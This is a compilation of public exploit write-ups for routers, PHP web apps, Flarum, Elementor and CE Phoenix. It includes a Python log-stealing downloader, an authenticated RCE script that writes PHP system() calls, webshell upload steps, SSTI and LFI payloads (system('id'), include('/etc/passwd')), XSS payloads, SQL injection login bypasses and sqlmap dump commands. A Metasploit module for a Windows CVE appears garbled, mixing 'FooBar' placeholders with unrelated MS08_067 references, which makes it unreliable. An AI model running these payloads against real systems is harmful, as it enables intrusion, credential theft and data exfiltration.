ISHACK AI BOT

# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download # CVE: CVE-2024-27356 # Google Dork: intitle:"GL.iNet Admin Panel" # Date: 2/26/2024 # Exploit Author: Bandar Alharbi (aggressor) # Vendor Homepage: www.gl-inet.com # Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin # Tested Model: GL-X3000 Spitz AX # Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md import sys import requests import json requests.packages.urllib3.disable_warnings() h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'} def DoesTarExist(): r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h) if r.status_code == 200: f = open("logread.tar", "wb") f.write(r.content) f.close() print("[*] Full logs archive `logread.tar` has been downloaded!") print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!") return True else: print("[*] The `logread.tar` archive does not exist however ... try again later!") return False def isVulnerable(): r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h) if r1.status_code == 500 and "nginx" in r1.text: r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h) if "Admin-Token" in r2.text: j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]} r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h) ver = r3.json()['result']['firmware_version'] model = r3.json()['result']['model'] if ver.startswith(('4.')): print("[*] Firmware version (%s) is vulnerable!" %ver) print("[*] Device model is: %s" %model) return True print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!") return False def isAlive(): try: r = requests.get(url, verify=False, timeout=30, headers=h) if r.status_code != 200: print("[*] Make sure the target's web interface is accessible!") return False elif r.status_code == 200: print("[*] The target is reachable!") return True except Exception: print("[*] Error occurred when connecting to the target!") pass return False if __name__ == '__main__': if len(sys.argv) != 2: print("exploit.py url") sys.exit(0) url = sys.argv[1] url = url.lower() if not url.startswith(('http://', 'https://')): print("[*] Invalid url format! It should be http[s]://<domain or ip>") sys.exit(0) if url.endswith("/"): url = url.rstrip("/") print("[*] GL.iNet Unauthenticated Full Logs Downloader") try: if (isAlive() and isVulnerable()) == (True and True): DoesTarExist() except KeyboardInterrupt: print("[*] The exploit has been stopped by the user!") sys.exit(0)

# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) # Date: 02/04/2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: v1.0 # Tested on: Windows 10 # CVE: CVE-2024-29410 # Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component. # POC: 1. Here we go to : http://127.0.0.1/fuelflow/index.php 2. Now login with default [email protected] and Password=admin 3. Now go to "http://127.0.0.1/fuelflow/admin/web.php" 4. Upload the san.php file in "Image" field 5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page 6. The content of san.php file is given below: <?php phpinfo();?> # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md

# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html # Version: v1.0 # Tested on: Windows 10 # Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the Firstname and lastname parameter in the profile component. # POC: 1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile 2. In fname & lname parameter add payolad "><script>alert("Hacked_by_Sandy")</script> 3. click on submit. # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md

# Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://code-projects.org # Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/ # Version: v1.0 # Tested on: Windows 10 # CVE : CVE-2024-29412 # Description: Stored Cross Site Scripting vulnerability in Hospital Management System - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the 'patient_id', 'first_name','middle_initial' ,'last_name'" in /receptionist.php component. # POC: 1. Go to the User Login page: " http://localhost/HospitalManagementSystem-gh-pages/ 2. Login with "r1" ID which is redirected to " http://localhost/HospitalManagementSystem-gh-pages/receptionist.php" endpoint. 3. In Patient information functionality add this payload "><script>alert('1')</script> ,in all parameter. 4. click on submit. # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md

############################################# # Exploit Title : Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation # Exploit Author: E1 Coders # CVE: CVE-2024-21338 ############################################# require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact def initialize(info = {}) super( update_info( info, 'Name' => 'CVE-2024-21338 Exploit', 'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.', 'Author' => 'You', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2024-21338'] ] ) ) register_options( [ OptString.new('RHOST', [true, 'The target address', '127.0.0.1']), OptPort.new('RPORT', [true, 'The target port', 1234]) ] ) end def check connect begin impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar') rescue Rex::Post::Meterpreter::RequestError return Exploit::CheckCode::Safe end Exploit::CheckCode::Appears end def exploit connect begin impacket_artifact( dcerpc_binding('ncacn_ip_tcp'), 'FooBar', datastore['FooBarPayload'] ) rescue Rex::Post::Meterpreter::RequestError fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact' end handler disconnect end end #refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338

Exploit Title: FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Local File Inclusion (LFI) due to the unsafe handling of file paths in the email template. An attacker with administrative access can exploit this vulnerability to include sensitive files from the server's file system in the email content, potentially leading to information disclosure. Steps to Reproduce: Log in as an administrator on the Flarum forum. Navigate to the FoF Pretty Mail extension settings. Edit the email default template and insert the following payload at the end of the template: {{ include('/etc/passwd') }} Save the changes to the email template. Trigger any action that sends an email, such as user registration or password reset. The recipient of the email will see the contents of the included file (in this case, /etc/passwd) in the email content.

Exploit Title: FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side Template Injection (SSTI) due to the unsafe handling of template variables. An attacker with administrative access can inject malicious code into the email template, leading to arbitrary code execution on the server. Steps to Reproduce: - Log in as an administrator on the Flarum forum. - Navigate to the FoF Pretty Mail extension settings. - Edit the email default template and insert the following payload: {{ 7*7 }} {{ system('id') }} {{ system('echo "Take The Rose"') }} - Save the changes to the email template. - Trigger any action that sends an email, such as user registration or password reset. - The recipient of the email will see the result of the injected expressions (e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id') }}, and the output of the echo "Take The Rose" command for {{ system('echo"Take The Rose"') }}) in the email content.

# Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) # Date: 2024-1-19 # Exploit Author: tmrswrr # Category: Webapps # Vendor Homepage: https://www.lepton-cms.com/ # Version : 7.0.0 1 ) Login with admin cred > https://127.0.0.1/LEPTON/backend/login/index.php 2 ) Go to Languages place > https://127.0.0.1/LEPTON/backend/languages/index.php 3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?> 4 ) After click install you will be see result # Result : uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)

# Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24499 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > /employee_akpoly/Admin/edit_profile.php > Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.   ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. ## Proof of Concept: ### SQLMap Save the following request to `edit_profile.txt`: ``` POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 88 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/edit_profile.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate= ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump ``` ## Recommendations When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

# Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24494 ### Stored Cross-Site Scripting (XSS): > Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security. ### Affected Components: > add-tracker.php, update-tracker.php Vulnerable parameters: - day - exercise - pray - read_book - vitamins - laundry - alcohol - meat ### Description: > Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page. ## Proof of Concept: The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability. Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value: ``` POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 175 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes ```  ## Recommendations When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24497 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > /employee_akpoly/Admin/login.php > Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection.   ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. ## Proof of Concept: ### Manual Exploitation The payload `' and 1=1-- -` can be used to bypass authentication within admin login page. ``` POST /employee_akpoly/Admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 61 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/login.php Cookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin= ``` ### SQLMap Save the following request to `admin_login.txt`: ``` POST /employee_akpoly/Admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 62 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/login.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtusername=admin&txtpassword=password&btnlogin= ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump ``` ## Recommendations When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24495 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > delete-tracker.php ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. ## Proof of Concept: ### Manual Exploitation The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 ```  ### SQLMap Save the following request to `delete_tracker.txt`: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump ``` ## Recommendations When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24496 ### Broken Access Control: > Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them. ### Affected Components: > home.php, add-tracker.php, delete-tracker.php, update-tracker.php ### Description: > Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials. ## Proof of Concept: ### Unauthenticated Access to Home page > To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page. ### Create Tracker as Unauthenticated User To create a tracker, use the following request: ``` POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 108 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes ``` ### Update Tracker as Unauthenticated User To update a tracker, use the following request: ``` POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 121 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes ``` ### Delete Tracker as Unauthenticated User: To delete a tracker, use the following request: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ``` ## Recommendations When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.

#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi #References #CVE : CVE-2023-0329 #E1.Coders #Open Burp Suite. #In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080. #Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080. #Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page. #On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": #code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);# #Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request. #Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward". #The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection. #Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s # #References : https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/ #Exploit Python : #The provided SQLi attack vector can be achieved using the following Python code with the "requests" library: #This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection. #Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct import requests # Set the target URL and SQLi payload url = "http://localhost:8080/wp-admin/admin-ajax.php" data = { "action": "elementor_ajax_save_builder", "editor_post_id": "1", "post_id": "1", "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#" } # Send the request to the target URL response = requests.post(url, data=data) # Check if the response indicates a successful SQL injection if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text: print("SQL Injection successful!") else: print("SQL Injection failed.")

# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS) # Date: 2023-11-14 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46020 ------------------------------------------------------------------------------- # Description: The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile. Vulnerable File: updateprofile.php Parameters: rename, remail, rphone, rcity # Proof of Concept: ---------------------- 1. Intercept the POST request to updateprofile.php via Burp Suite 2. Inject the payload to the vulnerable parameters 3. Payload: "><svg/onload=alert(document.domain)> 4. Example request for rname parameter: --- POST /bloodbank/file/updateprofile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 103 Origin: http://localhost Connection: close Referer: http://localhost/bloodbank/rprofile.php?id=1 Cookie: PHPSESSID=<some-cookie-value> Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update ---- 5. Go to the profile page and trigger the XSS XSS Payload: "><svg/onload=alert(document.domain)>

## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated) #### Date: 2023-11-25 #### Exploit Author: tmrswrr #### Category: Webapps #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/) #### Version: v1.0.8.20 #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix) ## EXPLOIT : import requests from bs4 import BeautifulSoup import sys import urllib.parse import random from time import sleep class colors: OKBLUE = '\033[94m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' CBLACK = '\33[30m' CRED = '\33[31m' CGREEN = '\33[32m' CYELLOW = '\33[33m' CBLUE = '\33[34m' CVIOLET = '\33[35m' CBEIGE = '\33[36m' CWHITE = '\33[37m' def entry_banner(): color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING, colors.CRED, colors.CBEIGE] random.shuffle(color_random) banner = color_random[0] + """ CE Phoenix v1.0.8.20 - Remote Code Execution \n Author: tmrswrr """ for char in banner: print(char, end='') sys.stdout.flush() sleep(0.0045) def get_formid_and_cookies(session, url): response = session.get(url, allow_redirects=True) if response.ok: soup = BeautifulSoup(response.text, 'html.parser') formid_input = soup.find('input', {'name': 'formid'}) if formid_input: return formid_input['value'], session.cookies return None, None def perform_exploit(session, url, username, password, command): print("\n[+] Attempting to exploit the target...") initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php" formid, cookies = get_formid_and_cookies(session, initial_url) if not formid: print("[-] Failed to retrieve initial formid.") return # Login print("[+] Performing login...") login_payload = { 'formid': formid, 'username': username, 'password': password } login_headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36', 'Referer': initial_url } login_url = url + "/admin/login.php?action=process" login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True) if not login_response.ok: print("[-] Login failed.") print(login_response.text) return print("[+] Login successful.") new_formid, _ = get_formid_and_cookies(session, login_response.url) if not new_formid: print("[-] Failed to retrieve new formid after login.") return # Exploit print("[+] Executing the exploit...") encoded_command = urllib.parse.quote_plus(command) exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B" exploit_headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36', 'Referer': login_response.url } exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save" exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True) if exploit_response.ok: print("[+] Exploit executed successfully.") else: print("[-] Exploit failed.") print(exploit_response.text) final_response = session.get(url) print("\n[+] Executed Command Output:\n") print(final_response.text) def main(base_url, username, password, command): print("\n[+] Starting the exploitation process...") session = requests.Session() perform_exploit(session, base_url, username, password, command) if __name__ == "__main__": entry_banner() if len(sys.argv) < 5: print("Usage: python script.py [URL] [username] [password] [command]") sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] command = sys.argv[4] main(base_url, username, password, command)

# Exploit Title: Smart School 6.4.1 - SQL Injection # Exploit Author: CraCkEr # Date: 28/09/2023 # Vendor: QDocs - qdocs.net # Vendor Homepage: https://smart-school.in/ # Software Link: https://demo.smart-school.in/ # Tested on: Windows 10 Pro # Impact: Database Access # CVE: CVE-2023-5495 # CWE: CWE-89 - CWE-74 - CWE-707 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /course/filterRecords/ POST Parameter 'searchdata[0][title]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi] ------------------------------------------- POST /course/filterRecords/ HTTP/1.1 searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3 ------------------------------------------- searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi] Path: /course/filterRecords/ POST Parameter 'searchdata[0][title]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi POST Parameter 'searchdata[1][title]' is vulnerable to SQLi POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi POST Parameter 'searchdata[1][searchvalue]' is vulnerable 